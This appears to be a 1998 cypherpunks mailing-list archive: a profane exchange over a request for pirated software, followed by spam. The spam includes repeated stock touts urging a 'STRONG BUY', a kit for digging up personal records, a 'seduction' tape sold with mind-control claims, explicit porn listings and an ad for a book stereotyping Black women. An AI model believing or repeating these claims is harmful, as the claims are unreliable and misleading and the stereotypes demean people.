> > Could someone give me a copy of statgraphics for dos or windows?
> > I would gladly appreciate it.
> > 
> > Thank you very much.
> > 
> 
> I will assume this is a piece of commercial software and respectfully
> tell you to go fuck yourself.  What kind of fucking list do you think
> this is? 

Well I thought this list was a list of intellectuals, not only good in 
hacks and coding and programming and the likes but also well "tailored"
with their manners,  I have posted similar mails asking something but I
have never received one like this. At least the less obvious thing to do
is to ignore my message, simply delete it!, is that a hard thing to do?

I have sent mails asking for something but it is OK with me if they are
ignored. 

My apologies to the list members.
Maybe it's time to REMOVE my name in the list.
Thank you.

It was nice having sent and replied by the members.
Thank you for your great help especially for the last months.











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bernardo B. Terrado" <bbt@mudspring.uplb.edu.ph>
Date: Wed, 18 Nov 1998 19:47:26 -0800 (PST)
To: Jim Gillogly <jim@acm.org>
Subject: manners and piracy
In-Reply-To: <365371F6.2D9A3CB0@acm.org>
Message-ID: <Pine.GSO.3.96.981119114004.1068A-100000@mudspring.uplb.edu.ph>
MIME-Version: 1.0
Content-Type: text/plain


I don't intend to pirate anything or make someone do  it in any case.

Well anyway thank you for your reply.
What I'm trying to point out is this
  it is OK with me if you say "Take your piracy requests elsewhere" 
  it is not OK with me if you say " ...fuck yourself"

gets?

On Wed, 18 Nov 1998, Jim Gillogly wrote:

> Bernardo B. Terrado wrote:
> > > Could someone give me a copy of statgraphics for dos or windows?
> > > I would gladly appreciate it.
> 
> and then took issue with somebody obscenely taking him to task for
> asking these lists for a pirated version of this software:
> 
> > Well I thought this list was a list of intellectuals, not only good in 
> > hacks and coding and programming and the likes but also well "tailored"
> > with their manners,
> 
> Bernardo, this package costs in the neighborhood of $900 US.  What makes
> you think the mannered intellectuals you expect to find on these
> lists would either condone or contribute to software piracy on this
> scale?  Or that they would not take violent verbal objection to the
> suggestion that they would do so?
> 
> Take your piracy requests elsewhere.  These aren't warez lists.
> -- 
> 	Jim Gillogly
> 	29 Blotmath S.R. 1998, 01:12
> 	12.19.5.12.12, 4 Eb 5 Ceh, Ninth Lord of Night
> 







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: listmaster@extensis.com
Date: Thu, 19 Nov 1998 14:05:18 -0800 (PST)
To: undisclosed-recipients:;
Subject: *QX-Tools. What Are you waiting for? 6 Stars?
Message-ID: <bulk.3512.19981119091838@mailblast.extensis.com>
MIME-Version: 1.0
Content-Type: text/plain


Extensis QX-Tools 4.0 Takes the Prize-again, and again, and again.
http://www.extensis.com/qxtools

* 5 STARS! -Publish Magazine, December 1998 
* 5 STARS! -Computer Arts UK, November 1998 
* 4 1/2 MICE! -MacWorld, December 1998 
* 4 MICE! -MacUser UK, October 1998 
* 4 DIAMONDS!-Emediaweekly, September 1998 


We have received such enthusiasm from customers and reviewers, alike-we
just had to share!  At Extensis, we never get tired of having multiple
wingdings attached to our reviews, and the quotes are even better! Judge
for yourself.


"QX-Tools 4.0 belongs among your most valuable XTensions. 
QX-VectorEdit's ability to import PostScript and PDF alone is worth the
price." - Publish, 12/98

"Some inventions are so obvious, you wonder why no one thought of them
before-enter Extensis QX-Tools 4.0. QX-Tools is an excellent collection
of XTensions and it's a good value too-even if you only use half of
them"-Computer Arts, 11/98

"QX-Tools 4.0 enables designers to transcend XPress' limitations and
work more efficiently and intuitively."-eMediaweekly, 9/98

So, what are YOU waiting for?  Six Stars?  Check out Extensis QX-Tools,
and get the Quark you REALLY want!

To download a demo, get information, or to buy on-line, visit
http://www.extensis.com/qxtools 
Or call Extensis at 1(800) 796-9798 or (503) 274-2020.

Extensis QX-Tools is fully compatible with QuarkXPress 4.0.3 or later,
and is available for both Mac and Windows.

PS. We have made every effort to ensure this message is being sent only
to people who have expressed interest in Extensis products.  If we have
sent this to you in error, please accept our apologies and reply with
"REMOVE" in the subject line for automatic exclusion from future
communications.  If you know someone who would like to be on our mailing
list have them send an email to listmaster@extensis.com with "ADD" in the subject line and
their email address in the body.

P.P.S. This message is intended for North American customers.  If you
are located outside of North America and have received this message,
please visit  http://www.extensis.com/wheretobuy/ to find the nearest
local distributor in your country.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: harangi@ludens.elte.hu
Date: Fri, 20 Nov 1998 04:52:48 -0800 (PST)
To: marco432@worldnet.att.net
Subject: YOUR  CLASSIFIED - AD / 333  NEWSPAPERS   !!!!
Message-ID: <21ED8433758@YODA.UHCOLORADO.EDU>
MIME-Version: 1.0
Content-Type: text/plain



YOUR AD IN 333 NEWSPAPERS !!!!!!!!!!
***********************************************

         Seven years ago, I learned how to place my Classified Ad in
several hundred newspapers, with just one telephone call.  And, my
cost was $0.51 per newspaper.  The total circulation was well over
1.5 Million.  I could reach just about any market, anywhere in this
country.  Since then, my small mail-order company has exploded.
And, I use this same time tested and true method week after week.

         I would like to share this powerful information and show you
how to save hundreds, even thousands of dollars on advertising that
works.  The average cost of a classified ad in a newspaper is about
$15.00 to $20.00 dollars.  Multiply that by 333 and your total cost is
well over $6,000.00 Dollars.  By using our amazing method, your
total cost is only $170.00.  Not to mention the time and money you
save by placing one call, instead of 333 long distance calls.

          You can limit your promotion to a Single State or place your
ad in Several States around the country, all with just one phone call.
You can reach One Million Readers on the East-Cost today and a
Million on the West-Coast tomorrow.  It's that simple  !!!!

            Your cost for this priceless information, is only $19.00 !!!  
You will make that back on your first promotion.  WE are so confident that
this type of advertising will boost your profits, we will guarantee your
satisfaction with our Money Back Guarantee !!  So, you have nothing
to lose.  Now, order our amazing classified ad method today !!!!!! 


                                PRINT ORDER FORM
Ship To:                    **************************
*********
NAME____________________________________________

ADDRESS________________________________________

CITY______________________________________________

STATE__________________    ZIP_____________________

E-MAIL__________________________________

Don't Delay,   ORDER YOUR COMPLETE MEDIA KIT TODAY !!!!!!!

**********************************************************************
Mail Payment  $19.00  CASH,  money order,  or check  TO:
********************
 
                                  INFORMATION, Ltd.
                                  P. O. Box  515019 
                                  St. Louis, MO 63151-5019  
                                  U.S.A.

WE will ship your complete KIT directly to you !!!!
 

**************************************************************
OPTIONAL / OVERNIGHT SHIPPING - ADD $15.00
**************************************************************
                          
Thank you for your kind attention, and have a nice day !!!


+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


Find Out Anything About Anyone On The Net  !!!
=========================================

YOU can easily learn how to investigate and learn EVERYTHING 
about your employees, neighbors, friends, enemies, and or
anyone else  !!!


It is absolutely amazing !!!
YOU Must Get This Extraordinary Package today.........


   +  YOU can track down an old friend or a lost love,
     and, just for fun, investigate your family history.

   +  YOU can screen prospective employees criminal records,
     look at their driving, or credit history.

   +  YOU can verify test results from drug testing and even
     look into your children's friends history for any type 
     of record.

   +  YOU can TRACK down and locate an old debtor who is
     hiding from you and see if he/she is hiding any assets.

   +  YOU can look up "unlisted telephone numbers."  Locate
     social security, birth, adoption or death records.
     Check Army, Navy, Marine Corps, or Air Force service
     file records.  YOU will simply be amazed to learn what
     sensitive and important information other people and
     enemies can discover about YOU !!!!!

YOU Can Find Out Anything About Anyone On The Net !!!
Do background checks on people and charge for it, as
you start your own investigative services.
Stop guessing about the LAW !!!
Look up laws and do much more, direct from famous law libraries.
Get this easy to use  KIT  right away, and then,
YOU can become a private investigator.

ORDER TODAY !!!!!


Send $18.00 cash (wrapped in two pieces of paper),
money order, or check to:

                    INFORMATION, Ltd.
                    P. O. Box  515019
                    St. Louis, MO  63151-5019  USA

The Complete Package Will Be Immediately Shipped
Prepaid Directly to You With Everything You Will Need
In Your Kit to Get Started Right Away !!

THANK YOU for your kind attention, and have a nice day !!!!


       YOU MAY ORDER BOTH PACKAGE KITS FOR ONLY $33.00


++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Admin
Internet Services
This message is not intended for residents in the 
State of Washington, screening of addresses has been done
to the best of our technical ability.
If you are a Washington resident or otherwise wish to be
removed from this list, go to global remove site if you want
your address removed from future mailing. 
http://209.84.246.162/remove.htm
 
This Global Communication has been sent to you by:
PAVILION INTERNATIONAL SERVICES
Offices:  London, Paris, Berlin, Hong Kong


















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED FRI NOV 20 <stuffed@stuffed.net>
Date: Fri, 20 Nov 1998 03:14:11 -0800 (PST)
To: (100S OF FREE DAILY PICS!)
Subject: STUFFED NOW HAS LINKS TO 100S MORE PHOTOS!
Message-ID: <19981120081000.21237.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


CHECK OUT ALL THE NEW STUFF IN STUFFED!

+ WHAT'S WRONG WITH SEX?
+ CYBERIAN GIRLS
+ STAR WHORES
+ MATURE WOMEN
+ LAND O LEZ
+ XXX FREE PUSSY
+ INDIAN PORN
+ ASS HUMPER
+ SMUT FOR FREE
+ EXXXTACY PORNO
+ MUCH, MUCH MORE!

       ---->   http://stuffed.net/home/   <----

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/home/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bullwinkle@3253137429
Date: Fri, 20 Nov 1998 20:51:41 -0800 (PST)
To: perotrump@3253137429
Subject: Ecstasy: The way to true happiness
Message-ID: <199811210451.UAA11792@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Ecstasy - The Seduction Audio Cassette Tape! 

Can Modern Technology be used to put women into a more "receptive mood?" 
Can Modern Technology be used to make women "more attractive" to men? 
Can Modern Technology make you a better lover, a more satisfied lover, a more confident lover? 


         YES IT CAN! 

Read what just two customers said: 

"I never met so many women so happy to sleep with me!" 
          JK, Des Moines IA 
  
"WOW. Thanks for a sexual experience I did not dream possible without drugs." 
          HP Manhattan, NY 
  
According to Dr. Martin Feinberg: 
       "This is an amazing and unique tape. The sounds were designed to stimultate brain centers. To enhance pleasure. Reach new levels of sexual experiences without any chemicals or drugs but rather by allowing you mind to be stimulated by audio signals. The velvet voice provides a hypnotic-like state that produces a flow of intense pleasure and satisfaction. All that you need to do is listen." 

Hundreds of Tapes have been sold -- and rarely has one been returned. It is fully guaranteed to work as advertised or your money is refunded. You have NOTHING to lose. 

The Ecstasy tape was designed by a licensed Mental Health Counsellor specifically for her clients who had problems meeting the opposite sex, attracting the opposite sex, and having great sex with the opposite sex. Clinically tested, and set to digital music specifically designed to enhance the effects of the tape, you may never find another 
tape like it. Not yet sold in stores, it is only available on the Internet. 

    Listen to the Ecstasy Tape alone or with a lover or friend. 
    Listen to the Ecstasy Tape and change the way you meet women/men. 
    Listen to the Ecstasy Tape and change the way women and men feel     about you. 
    Listen to The Ecstasy Tape and change the way you experience sex forever. 

100% Legal. 

Is it mind control? 
       You'll have to listen and decide for yourself. 

GUARANTEED* TO: 

       Have potential lovers be attracted to you. 
       Be a Great Lover. 
       Maximize Your Sexual Pleasure. 
       Satisfy any lover. 
   *GUARANTEED or your money refunded! 

As you listen to the tape your body will feel what it never felt before. 
       Listen alone. 
       Or with a lover. 
       It is a most unbelievable, indescribable experience. 

       100% Legal. 
       Not a drug. But as powerful as drugs. 
       Not an aphrodisiac. But as powerful as one. 
       Not subliminal but more powerful. 

This tape, this experience is 100% legal, however, you must be over 18 to purchase it. 
No exceptions. 

Absolute satisfaction or purchase price refunded. 

Listen to the Ecstasy Tape. Experience True Sexual Ecstasy. For 6 months. 

If you can bear to return the tape after trying for up to 6 months, we will refund your payment. 

This may be your first and last opportunity to experience Ecstasy possibly the only seduction tape you'll ever find that really works. 

The digitally prepared Audio Cassette is $19.47 shipped to you. ($17.12 plus $2.45 shipping/handling). Florida residents add sales tax. 

It is easy to order. You must be over 18.  No exceptions. 

The digitally prepared Audio Cassette is $19.47  shipped to you. ($17.12 plus $2.45 
shipping/handling).  Florida residents add sales tax. 

To order with your MasterCard, Visa, Discover or American Express card. 

Call our operators (24 hours) at (520) 453-0303 Extension - 222 
        And say "I'd like to order the Ecstasy Tape." 

OR 
        mail a check or money order for $19.47 to: 
               Euphoria Products 
               1859 No Pine Island Rd. 
               Suite #133 Dept.222 
               Plantation, FL 33322 

        Include your name and street address and write "I would like __ copies of the Ecstasy Tape # 222."  

Get extra tapes as gifts: add $9.50 for each additional tape. No additional shipping. 






The Mailing List that you are being mailed from was filtered against
a Global Filter List. If you would like not to recieve any other mailings of this type please goto:

http://3625362989/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: foreigncur@usa.net
Date: Fri, 20 Nov 1998 23:40:18 -0800 (PST)
To: foryou_5@hotmail.com
Subject: Ad: Unlimited Flat Rate Long Distance Calling?
Message-ID: <14638869_58568989>
MIME-Version: 1.0
Content-Type: text/plain



	SALES REPS NEEDED!

	     NEW 

	VOICE ACTIVATED

	  FLAT RATE

  LONG DISTANCE TELEPHONE SERVICE

CHECK US OUT...

     THE TELEPHONE WARS ARE OVER:

		WE WON!


NO MORE CENTS PER MINUTE...

UNLIMITED FLAT RATE LONG DISTANCE CALLING...


	BUSINESS OR HI VOLUME RESIDENTIAL: $60/month

	ECONOMY RESIDENTIAL (NIGHTS AND WEEKENDS): $20/month

OUT OF STATE AND IN STATE...

90% of all telephones in USA available by 12/31/98!

WE ARE SWEEPING THE COUNTRY!

CANADA available by 6/1/99...UNLIMITED FLAT RATE CALLING FROM THE 
USA TO CANADA AND VICE VERSA!

THE ENTIRE WESTERN HEMISPHERE, THE PACIFIC RIM AND EUROPE BY
12/31/99!

	SAVE $$$
	MAKE $$$

GET YOUR PIECE OF THE USA ESTIMATED LD MARKET THIS YEAR OF

160 BILLION DOLLARS!  A MARKET ESTIMATED TO BE IN THE TRILLIONS OF

DOLLARS IN THE NEXT FEW YEARS!


	AVAILABLE ONLY THOUGH OUR COMPANY!
	  CALL (800)600-0343, ext, 2197
			NOW!


-----------------------------------------------------
To be removed from this and other mailings send an
email to <remlist32@bigfoot.com>
Thank you.
-----------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: strongmarketstock75bbn@worldnet.att.net
Date: Sat, 21 Nov 1998 15:14:06 -0800 (PST)
To: smartinvestor1a@newsletter1a.net
Subject: RE:  "SIZZLER" INTERNET STOCK!
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


Company: Quest Net Corp.
Symbol:  Q N E T D
Price:  3  1/2  ($3.50/share)

QNETD is a provider of global Internet and
Intranet digital networking solutions.  QNETD
has strategic alliances with MCI WorldCom, 
BellSouth Corp. and PSINet, among others.

QNETD's business model, according to independent
analysts, is projected for unprecedented exponential
growth.  QNETD is rated an immediate and "STRONG
BUY". 

For more information go to:  http://quote.yahoo.com





ggi.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: npusa@newpostoffice.com
Date: Fri, 20 Nov 1998 14:17:51 -0800 (PST)
To: youngprof@yahoo.com
Subject: An Invitation To Our "Netparty" For Young Professionals
Message-ID: <36120.220947222223900.191338@localhost>
MIME-Version: 1.0
Content-Type: text/plain


**************************************************************
Do You Wish To Continue Receiving Invitations To Our Events?

Please let us know by sending an e-mail to npevents@newpostoffice.com
or by calling us at 212.969.0293.
**************************************************************
Networking parties are "a genuinely original idea" 
-- Crain's New York Business

"In New York, it is possible to bring together hundreds of people 
and their business cards for a networking evening.  And if sometimes 
the evening also leads to romance, that is a fringe benefit."  
-- The New York Times

Netparty
*********
After-Work Networking Events
For Young Professionals
*******************************
Wednesday, November 25, 6 p.m. - 11 p.m. at
Webster Hall (Thanksgiving Eve -- The Year's Biggest Event!)
(125 E. 11th St., btwn 3rd and 4th Aves., NYC)

Friday, December 4, 6 p.m. - 11 p.m. at
The Roxy (1000+ Expected at One of NYC's Largest Nightclubs)  
(515 W. 18th St. at 10th Ave., NYC)
***************************************************

       Hi.  We are sending you this message to invite you (and, if you 
would like, a few interesting friends) to one of the after-work 
business/social events we sponsor.  Our  Netparty has become 
New York's best-attended event for young professionals.  Over 1,000
people attended our most recent Netparty and over 1,500 are expected
for this week's Thanksgiving Eve Event.

       
WHAT IS A NETPARTY?

      A Netparty is a "networking party" -- an opportunity for young 
professionals to network with each other on a business level (we 
encourage you to exchange business cards) and to interact 
with each other on a social level.  Crain's New York
Business has called networking parties "a genuinely original idea."

      Netparty events are held at Manhattan's hottest nightclubs -- but 
the music is never so loud that you cannot talk and the crowd is 
comprised entirely of young (20's, 30's, 40's) professionals.  We're 
inviting doctors, teachers and entrepreneurs, attorneys, advertising 
executives, actresses, sales professionals, writers, investment bankers 
and many other professionals to our upcoming event.  You may
feel free to forward this e-mail to others who you think may be
interested as well.  

THE NEXT NETPARTIES:
Wednesday, November 25 at Webster Hall
Friday, December 4 at The Roxy
Friday, December 11 (Location To Be Announced)
Friday, December 18 at Creation

	Our next Netparty will take place this Wednesday, November 25.  
For this event, we will be returning to the Grand Ballroom of Webster 
Hall (125 E. 11th St., between 3rd and 4th Aves.) for what we believe 
will be our biggest event of the year -- our Thanksgiving Eve Event. 
Over 1500 people are expected to attend.  In addition to networking 
opportunities, this event will feature a coffee bar, DJ and dancing.  
Doors open at 6 p.m. and you must arrive by 10 p.m to be guaranteed 
admission.  Please note that you are welcome to enjoy Webster Hall 
even after our Netparty ends -- in fact Webster Hall will be holding
a party for Jerry Springer's new movie "Ringmaster" right after our Netparty.   

	Coming in December -- more great network events at New York's 
best nightspots.  Please mark your calendars so that you might join 
us at The Roxy on Friday, December 4 and at our debut at a new 
nightspot -- "Creation" -- on Friday, December 18.  We will also 
hold an event on Friday, December 11;  however the location for 
that event has not yet been finalized.

ADMISSION, DRESS CODE, AGES

      Admission to our events is only $8 at the door.  It is not 
necessary to make a reservation, just show up!  Please note that 
for the Wednesday, November 25 Thanksgiving Eve Event at Webster 
Hall, you must arrive by 10 p.m to be guaranteed admission.  

	No jeans or sneakers are permitted at our events and business 
attire or "Friday casual" attire is requested.  You must be 21 to 
attend. The event is designed for those in their 20's, 30's and 40's; 
the majority of attendees are in their 20's and 30's.   
     
QUESTIONS?

       We are always available to answer any questions you might have.  
If you would like to e-mail us, simply write to 
npevents@newpostoffice.com.  If you should experience any problems 
in communicating with us by e-mail, or, if a quicker response to your 
question is required, please telephone us at (212) 969-0293.  

    We hope to see you this Wednesday, November 25 at Webster Hall and 
at our December Netparties.

                          
                                  -- Jeff @ Netparty


Netparty Events, PO Box 2518, New York, NY 10021 (212) 969-0293







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED SAT NOV 21 <stuffed@stuffed.net>
Date: Sat, 21 Nov 1998 01:14:51 -0800 (PST)
To: (100S OF FREE DAILY PICS!)
Subject: STUFFED NOW HAS LINKS TO 100S MORE PHOTOS!
Message-ID: <19981121081000.4944.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


CHECK OUT ALL THE NEW STUFF IN STUFFED!

+ PUSSY SEX VIDEOS
+ MEGA XXX MOVIES
+ PREMIUM PICTORIALS
+ PORN MIX
+ XXXPOSE
+ XXX ASIAN SLUTS
+ HARDCORE SEX WITH ZOOM
+ BLACK NYMPHOS
+ WACK OFF ZONE
+ ADUDE'S PLACE
+ MUCH, MUCH MORE!

       ---->   http://stuffed.net/home/   <----

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/home/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: strongmarketstock75bbn@worldnet.att.net
Date: Sun, 22 Nov 1998 02:08:19 -0800 (PST)
To: smartinvestor1a@newsletter1a.net
Subject: RE:  "SIZZLER" INTERNET STOCK!
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


Company: Quest Net Corp.
Symbol:  Q N E T D
Price:  3  1/2  ($3.50/share)

QNETD is a provider of global Internet and
Intranet digital networking solutions.  QNETD
has strategic alliances with MCI WorldCom, 
BellSouth Corp. and PSINet, among others.

QNETD's business model, according to independent
analysts, is projected for unprecedented exponential
growth.  QNETD is rated an immediate and "STRONG
BUY". 

For more information go to:  http://quote.yahoo.com





ggi.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: itcmex@fastnet.com.mx
Date: Sat, 21 Nov 1998 16:31:41 -0800 (PST)
To: itcmex@fastnet.com.mx
Subject: Oportunidad de Negocio Diferente
Message-ID: <199811220128.TAA21045@mail.netmex.com>
MIME-Version: 1.0
Content-Type: text/plain


  QUIERE GANAR BASTANTE DINERO ?

                   ===========>>>>>>            http://209.116.145.95

Obten GRATIS software para enviar Correo Masivo  (promocion limitada)


_________________________________________________________
Si usted no desea recibir mas OPORTUNIDADES DE NEGOCIOS
regrese este E-mail insertando "remove" en el subject.
Por su tiempo  GRACIAS.
_________________________________________________________







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED SUN NOV 22 <stuffed@stuffed.net>
Date: Sun, 22 Nov 1998 01:14:57 -0800 (PST)
To: (100S OF FREE DAILY PICS!)
Subject: STUFFED NOW HAS LINKS TO 100S MORE PHOTOS!
Message-ID: <19981122081000.12042.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


CHECK OUT ALL THE NEW STUFF IN STUFFED!

+ XTACY
+ PADDERSON'S PLAYHOUSE
+ ASIA ILLUSTRATED
+ PORNCAST
+ TECHNOPORN
+ ORGASM 4 ALL
+ TOKYO GIRLS
+ ALL THAT ASS
+ FABULOUS HARDCORE PORN
+ SUGAR PIE
+ MUCH, MUCH MORE!

       ---->   http://stuffed.net/home/   <----

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/home/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sjfi@msn.com
Date: Sat, 28 Nov 1998 20:35:29 -0800 (PST)
To: hmwrkr@aol.com
Subject: WE LOVE IT!! TRAVEL, MONEY, AND...
Message-ID: <B0000044106@gataway.tectamm.com>
MIME-Version: 1.0
Content-Type: text/plain



FIRE THE BOSS AND BREAK THE ALARM CLOCK!
                             WE DID!
         Travel for pennies on the dollar
                               AND
Enjoy a "complimentary cruise" for two!

MAKE $3,000-$5,000 PER WEEK FROM HOME!

 We're looking for people with a good work ethic and
 extraordinary desire who want to change their lives!

 We will give you all the training and support that you will
             need to insure your success!!

      IF WE CAN DO THIS.....SO CAN YOU!!!!

         Not Multi-level Marketing or GPG!

          "Make Your Vocation a Vacation"
             
                 Call Now For Information
                   24 Hr Toll Free Number
                          1-888-376-1192 

Do not reply to this e mail for more information, you must call
listen to the message. 
You will only receive this e mail once.  Thank you.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: searchmaster80@hotmail.com
Date: Sun, 22 Nov 1998 23:55:53 -0800 (PST)
To: <curt@toad.com>
Subject: 5000+ URL Submissions to Search Engines/Directories - $99 !!- *AD*
Message-ID: <199811230755.XAA28163@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


==========================================================
This is a one time mailing. You will be automatically removed from this list.
==========================================================

Effective web site promotion is an essential part of just about any 
successful Internet marketing program. Search engine submission is the most 
effective and inexpensive way to advertise your web site on the Internet. We 
will submit your web site URL to 450+ search engines and directories once a 
month for an entire year. This includes all the major search engines and 
directories. Many other submission services you find on the Internet just 
submit your site URL one time at a much higher cost. One site URL submission 
is not as effective because of the constant changing of search engine 
placement strategy and the enormous growth of the Internet. We are submitting 
your site 12 different times. That is over 5000 site submissions for $99! But 
that's not all!

Search engine submission is worthless if your site isn't "search engine 
ready". In addition to this comprehensive submission service, a web 
design/marketing specialist will inspect the design of your web site and give 
you a detailed report of his findings and suggestions to help you get a 
higher placement in the search engines and directories. Keyword rich meta 
tags are essential to get your site a high placement in most of the major 
search engines. We will custom create your meta tags if your site needs them 
at no extra cost. You will also get feedback on any content or HTML additions 
that might prove beneficial to search engine placement. This service alone is 
worth much more then $99! Many of those other companies don't even know what 
your web pages look like and charge you twice the price!

Once you sign up to promote your site you will be entitled to the following 
special web promotion services. 

Web Page Design: $35.00 hr ($10 off regular rate)
Submit 2nd URL: $75.00 ($24 off regular price)
Site Inspections: FREE!
Meta Tag Generation: FREE!
Web Promotion Monthly Tips & Tricks: FREE!

====================================================

To order the submission service just print out this order form, complete the 
order form, and send it with your check, money order, or Visa & MasterCard 
information. If you would like to order online, reply to this message with 
"ORDER" in the subject line and you will get another email directing you to 
our Online Secure Order Form. Make check or money order payable to FTWI and 
send to:

    FTWI
    4019 Goldfinch St., Ste. J
    San Diego, CA  92103


Web Site URL to submit for $99
-http://__________________________________

Additional URL's to submit for $75 each 
-http://__________________________________
-http://__________________________________
-http://__________________________________
-http://__________________________________
-http://__________________________________

Please Note: If you are using Visa or MasterCard the following items must be 
exactly as they appear on the credit card, including any middle initial. 
Likewise, your address here must be identical to your credit card billing 
address. If they do not match, our system will not be able to verify your 
identity. 

customer name: ____________________________________________ 
address: __________________________________________ 
city: __________________ state: _________  zip: _________ 
phone #: ______________________ date:_______________
email address: _____________________________________
check payment method:  __ Visa   __ MasterCard  __ Check/Money Order
credit card number: _________________________________
Total payment: $_______________

Customer / Cardholder Signature: _______________________________
(Required to begin service)
 
 
 
 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: marketnewstoday11_24_98iilli@worldnet.att.net
Date: Mon, 23 Nov 1998 15:29:03 -0800 (PST)
To: investor0018@stck_news.com
Subject: RE: "SIZZLER" INTERNET STOCK!  .
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


Company: Quest Net Corp.
Symbol:  Q N E T
Price:  3  1/2  ($3.50/share)

QNET is a provider of global Internet and
Intranet digital networking solutions.  QNET
has strategic alliances with MCI WorldCom, 
BellSouth Corp. and PSINet, among others.

QNET's business model, according to independent
analysts, is projected for unprecedented exponential
growth.  QNET is rated an immediate and "STRONG
BUY". 

For more information go to:
http://quicken.excite.com/investments/quotes










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED MON NOV 23 <stuffed@stuffed.net>
Date: Mon, 23 Nov 1998 01:01:58 -0800 (PST)
To: (100S OF FREE DAILY PICS!)
Subject: STUFFED NOW HAS LINKS TO 100S MORE PHOTOS!
Message-ID: <19981123081001.20318.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


CHECK OUT ALL THE NEW STUFF IN STUFFED!

+ BABES & BLOWJOBS
+ LESBIAN HEAT
+ HENTAI BIJUTU
+ VIRTUAL SEX MACHINE
+ NAUGHTY SINGLE BABES
+ SATAN'S CIRCUS
+ CENTERFOLD PIX
+ NAUGHTY SINGLE BABES
+ SNATCH LAND
+ SEXXXPICS
+ MUCH, MUCH MORE!

       ---->   http://stuffed.net/home/   <----

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/home/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: BSB009@webmail.bellsouth.com
Date: Mon, 23 Nov 1998 14:39:54 -0800 (PST)
Subject: New Book: "Brothers Beware: Games Black Women Play"
Message-ID: <eaep.3.1.reg.KarTF7.36122.6942861111@websmtp1.bellsouth.bigfoot.com>
MIME-Version: 1.0
Content-Type: text/plain



Sisters are saying: "Burn This Book"
Brothers are saying: "Free at Last!"

You decide . . . 

Call Today To Order This Book - (800) 830-2047 
It will make a great Christmas Gift

Brothers Beware: 
Games Black Women Play 

by 
A. Marshall 
ISBN:0-9658299-3-6 
Price: $12.00 
$3 Shipping - COD Charges are FREE for a limited time. 

____________________________ 
Brothers Beware: Games Black Women Play is a book that 
pulls no punches when it details the many tricks and 
manipulative games for which black women are notorious. 

This book is an honest, no holds barred, uncensored 
discussion about dating in the African American community. 

The number of eligible black men is constantly decreasing. 
Therefore, black women are doing whatever is necessary to 
find and keep a good black man. Many of her secrets are 
exposed in this book. 

The author interviewed several black women who revealed 
many of the techniques used by Sisters to get what they 
want, and who they want, any time they want. These women 
were especially helpful on the hilarious chapter entitled: 
"Games Women Play On Each Other." 

The author had no need whatsoever to embellish - 
The TRUTH was definitely sensational enough. 

____________________________ 
Chapters 

"Was She Born This Way?" 
"What He Has Have To Be With Her" 
"What Have You Done For Me Lately?" 
"Lies Women Tell Men" 
"She's Got The Power" 
"The Dating Game" 
"The Sympathy Game" 
"The Suicide Game" 
"Honey, I'm Pregnant" 
"She Loves Me . . . She Loves Me Not" 
"Games Church Women Play" 
"Young Women and Old Fools" 
"Games Women Play on Each Other" 
"Was It Really Worth It?" 
_______________________________
Ordering Information

Brothers Beware: 
Games Black Women Play

ISBN:0-9658299-3-6 
Price: $12.00 
$3.00 Shipping - COD Charges are free for a limited time. 
Wholesale Discounts Available 

______________________________ 
Order by Phone 
800-830-2047 - 24 hrs 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vic" <tyu999@yahoo.com>
Date: Tue, 24 Nov 1998 08:23:27 -0800 (PST)
To: group21@yahoo.com
Subject: ADV: All LIVE Adult Parade! Free Offer!
Message-ID: <199811241520.QAA23694@cqs.ch>
MIME-Version: 1.0
Content-Type: text/plain


*******************************************************
    This message is sent in compliance of the new email bill section
301. per Section 301, Paragraph (a)(2)(C) of S. 1618, further
transmissions to you by the sender of this email may be stopped at no
cost to you by emailing mailto:wjohns@tophosting.com Please type
"Remove" in the subject line.Your request to be remove will be
processed within 24 hours.

Please DO NOT reply to this email if you wish to be removed.
--------------------------------------------------------

